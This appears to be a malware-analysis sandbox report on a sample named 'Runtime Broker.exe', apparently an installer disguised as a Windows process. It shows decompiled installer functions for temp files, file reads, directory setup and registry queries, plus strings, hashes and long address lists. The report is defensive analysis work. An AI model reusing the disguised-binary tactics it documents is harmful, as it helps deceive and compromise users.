0x00406fc1
0x00406fc4
0x00406fc8
0x00000000
0x00000000
0x00407018
0x0040701c
0x00407023
0x00407026
0x00407029
0x00407033
0x00000000
0x00407033
0x0040701e
0x00000000
0x00000000
0x0040703f
0x00407043
0x0040704a
0x0040704d
0x00407050
0x00407045
0x00407045
0x00407045
0x00407053
0x00407056
0x00407059
0x00407059
0x0040705c
0x0040705f
0x00407062
0x00407062
0x00407065
0x0040706c
0x00407071
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407103
0x004074a1
0x00000000
0x004074a1
0x00407109
0x0040710c
0x0040710f
0x00407113
0x00407116
0x0040711c
0x0040711e
0x0040711e
0x0040711e
0x00407121
0x00407124
0x00000000
0x00000000
0x00406cf4
0x00406cf4
0x00406cf8
0x00407465
0x00000000
0x00407465
0x00406cfe
0x00406d01
0x00406d04
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d19
0x00406d1c
0x00406d1f
0x00000000
0x00000000
0x00406d25
0x00406d2b
0x00000000
0x00000000
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5c
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d8f
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d98
0x00406d9f
0x00406da2
0x00000000
0x00406da8
0x00000000
0x00406da8
0x00000000
0x00406dad
0x00406dad
0x00406db1
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df5
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e20
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e25
0x00406e2c
0x00406e2f
0x00000000
0x00406e31
0x00000000
0x00406e31
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e36
0x00000000
0x00000000
0x00406e71
0x00406e71
0x00406e75
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e90
0x00406e93
0x00406e96
0x00406e96
0x00406e9c
0x00406e3a
0x00406e3a
0x00406e3d
0x00000000
0x00406e3d
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee4
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ee9
0x00406ef0
0x00406ef3
0x00000000
0x00406ef5
0x00000000
0x00406ef5
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00406f52
0x00406f52
0x00406f55
0x00000000
0x00000000
0x00407291
0x00407295
0x004072b7
0x004072ba
0x004072c4
0x004072c7
0x004072c7
0x00000000
0x004072c7
0x00407297
0x0040729a
0x0040729e
0x004072a1
0x004072a1
0x004072a4
0x00000000
0x00000000
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00407385
0x00407385
0x00000000
0x00407385
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x004072a8
0x004072a8
0x004072ab
0x00000000
0x00000000
0x0040743f
0x00407442
0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c3
0x004073c7
0x00407427
0x0040742a
0x0040742f
0x00407430
0x00407432
0x00407434
0x00407437
0x00407343
0x00407343
0x00000000
0x00407343
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073e7
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407419
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00406fcb
0x00406fcb
0x00406fcf
0x00407495
0x00000000
0x00407495
0x00406fd5
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00407009
0x00407009
0x00000000
0x00407009
0x0040728a
0x004074bf
0x004074e1
0x004074e7
0x004074e9
0x004074f0
0x00000000
0x00000000
0x00406aee
0x004074f6
0x004074f6
0x00000000

Strings

use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi, xrefs: 00406AAC
# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""", xrefs: 00406AB6

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID: use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi$# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508."""
API String ID: 0-717215376
Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406061, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406061(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406067
0x0040606d
0x0040606e
0x0040606e
0x00406073
0x00406074
0x00406077
0x0040607c
0x0040607f
0x00406089
0x00406096
0x0040609a
0x004060a2
0x00000000
0x00000000
0x004060a6
0x00000000
0x004060a8
0x004060a8
0x004060a8
0x004060ab
0x004060ae
0x004060ae
0x004060b1
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040607F
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A

Strings

nsa, xrefs: 0040606E
C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
"C:\Users\user\Desktop\Runtime Broker.exe" , xrefs: 00406061

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Runtime Broker.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3132972559
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768

Uniqueness

Uniqueness Score: -1.00%

Function 00403309, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00403309(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2d8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403411(4);
				if(_t22 >= 0) {
					_t24 = E004060B5( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403411(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004060B5( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E004060E4(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x0040330d
0x00403316
0x0040331f
0x00403323
0x0040332e
0x0040332e
0x00403336
0x0040333d
0x0040334f
0x00403356
0x004033fb
0x004033fb
0x00000000
0x0040335c
0x0040335f
0x0040336b
0x0040336f
0x00403409
0x00403409
0x00403375
0x00403378
0x004033d7
0x004033dd
0x004033df
0x004033df
0x004033f1
0x004033f9
0x00403400
0x00403403
0x00000000
0x00000000
0x00000000
0x00000000
0x0040337a
0x0040337d
0x00000000
0x00403383
0x00403388
0x0040338f
0x00403392
0x00403394
0x00403394
0x004033a1
0x004033a4
0x004033ab
0x00000000
0x00000000
0x004033b4
0x004033bb
0x004033d3
0x004033fd
0x004033fd
0x004033bd
0x004033bd
0x004033c0
0x004033c3
0x004033c9
0x004033cf
0x00000000
0x004033d1
0x00000000
0x004033d1
0x004033cf
0x00000000
0x004033bb
0x00000000
0x00403388
0x0040337d
0x00403378
0x0040336f
0x00403356
0x0040340b
0x0040340e

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E

Strings

# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""", xrefs: 00403383, 0040339A, 004033B0

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FilePointer
String ID: # -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508."""
API String ID: 973152223-102722458
Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402D3E(0xfffffff0);
				_t17 = E00405EBC(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E3E(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AF0( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B0D(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A73( *(_t36 + 8));
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653C(L"C:\\Program Files (x86)\\WinSoft Update Service\\Lib\\site-packages\\pip\\_vendor\\distlib",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022e9
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402bc5
0x00402bd1

APIs

Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A73: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6

SetCurrentDirectoryW.KERNELBASE(?,C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib,?,00000000,000000F0), ref: 0040164D

Strings

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib
API String ID: 1892508949-3629606024
Opcode ID: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
Opcode Fuzzy Hash: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040640A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0040640A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063A9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406418
0x0040641a
0x00406432
0x00406437
0x0040643c
0x0040647a
0x0040647a
0x0040643e
0x00406450
0x0040645b
0x00406461
0x0040646c
0x00000000
0x00000000
0x0040646c
0x00406480

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,markers.py,?,?,00406699,80000002), ref: 00406450
RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,markers.py,markers.py,markers.py,00000000,00422728), ref: 0040645B

Strings

markers.py, xrefs: 00406411

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CloseQueryValue
String ID: markers.py
API String ID: 3356406503-2111505683
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004060B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004060B5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b9
0x004060c9
0x004060d1
0x00000000
0x004060d8
0x00000000
0x004060da

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""", use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi,0040358D,0040A230,0040A230,00403491,# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""",00004000,?,00000000,0040333B), ref: 004060C9

Strings

use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi, xrefs: 004060B5
# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""", xrefs: 004060B8

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FileRead
